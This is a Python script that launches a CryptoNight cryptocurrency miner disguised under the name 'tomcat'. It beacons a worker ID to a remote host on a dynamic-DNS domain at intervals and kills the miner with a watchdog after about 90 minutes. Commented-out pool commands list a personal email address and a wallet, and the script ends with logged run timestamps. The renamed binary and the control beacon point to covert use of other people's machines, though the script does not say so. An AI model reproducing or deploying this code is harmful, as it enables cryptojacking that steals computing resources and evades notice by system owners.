import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:42:03.537890
#2018-02-17 16:29:01.819700
#2018-02-17 18:17:06.075687
#2018-02-17 20:04:05.465079
#2018-02-17 21:52:05.429043
#2018-02-17 23:37:01.507326
#2018-02-18 01:25:07.828115
#2018-02-18 03:12:08.028570
#2018-02-18 04:59:04.558020
#2018-02-18 06:51:01.616504
#2018-02-18 08:40:07.584433
#2018-02-18 10:26:04.981642
#2018-02-18 12:12:05.889734
#2018-02-18 13:58:02.194720
#2018-02-18 15:47:06.071202
#2018-02-18 17:38:06.191244
#2018-02-18 19:26:05.263067
#2018-02-18 21:13:01.377541
#2018-02-18 23:01:01.600157
#2018-02-19 00:48:04.002785
#2018-02-19 02:35:04.973765
#2018-02-19 04:21:05.218844
#2018-02-19 06:06:01.644368
#2018-02-19 07:54:05.030624
#2018-02-19 09:44:05.233482
#2018-02-19 11:34:04.531827
#2018-02-19 13:21:07.603106
#2018-02-19 15:08:06.322196
#2018-02-19 16:57:04.465508
#2018-02-19 18:46:06.213027
#2018-02-19 20:34:05.580151
#2018-02-19 22:22:03.976524
#2018-02-20 00:08:04.167477
#2018-02-20 01:55:01.668118
#2018-02-20 03:44:01.397964
#2018-02-20 05:30:01.947441
#2018-02-20 07:14:03.872902
#2018-02-20 08:59:08.357072
#2018-02-20 10:43:09.421585
#2018-02-20 12:29:06.566145
#2018-02-20 14:15:06.772085
#2018-02-20 15:58:05.765857
#2018-02-20 17:45:04.973195
#2018-02-20 19:38:08.558554
#2018-02-20 21:24:01.956083
#2018-02-20 23:08:05.932209
#2018-02-21 00:52:06.603293
#2018-02-21 02:39:04.474094
#2018-02-21 04:27:01.926365
#2018-02-21 06:15:08.973280
#2018-02-21 08:01:04.361342
#2018-02-21 09:48:06.579630
#2018-02-21 11:38:05.361033
#2018-02-21 13:27:07.194392
#2018-02-21 15:11:05.704856
#2018-02-21 17:01:06.617704
#2018-02-21 18:48:09.648772
#2018-02-21 20:31:01.544257
#2018-02-21 22:17:04.420398
#2018-02-22 00:06:02.059720
#2018-02-22 01:53:01.388745
#2018-02-22 03:40:01.512826
#2018-02-22 05:26:05.124765
#2018-02-22 07:11:07.680749
#2018-02-22 08:58:05.313985
#2018-02-22 10:45:09.178935
#2018-02-22 12:31:07.538398
#2018-02-22 14:15:09.545093
#2018-02-22 16:02:07.612897
#2018-02-22 17:49:01.884367
#2018-02-22 19:35:01.862726
#2018-02-22 21:28:04.940184
#2018-02-22 23:14:01.526728
#2018-02-23 01:01:04.670051
#2018-02-23 02:48:06.395718
#2018-02-23 04:37:07.352934
#2018-02-23 06:23:04.897111
#2018-02-23 08:11:04.761078
#2018-02-23 10:29:06.401705
#2018-02-23 12:22:03.757728
#2018-02-23 14:12:06.513638
#2018-02-23 16:02:06.058657
#2018-02-23 17:49:02.241251
#2018-02-23 19:35:07.676068
#2018-02-23 21:19:07.102914
#2018-02-23 23:07:03.848559
#2018-02-24 00:49:06.318449
#2018-02-24 02:34:04.969473
#2018-02-24 04:29:04.602335
#2018-02-24 06:15:08.587670
#2018-02-24 08:04:01.345773
#2018-02-24 09:48:04.147557
#2018-02-24 11:43:06.345575
#2018-02-24 13:34:07.392178
#2018-02-24 15:22:05.041419
#2018-02-24 17:12:03.850226
#2018-02-24 19:03:05.906631
#2018-02-24 20:52:01.377436
#2018-02-24 23:16:06.671729
#2018-02-25 02:40:09.860678
#2018-02-25 06:32:05.028943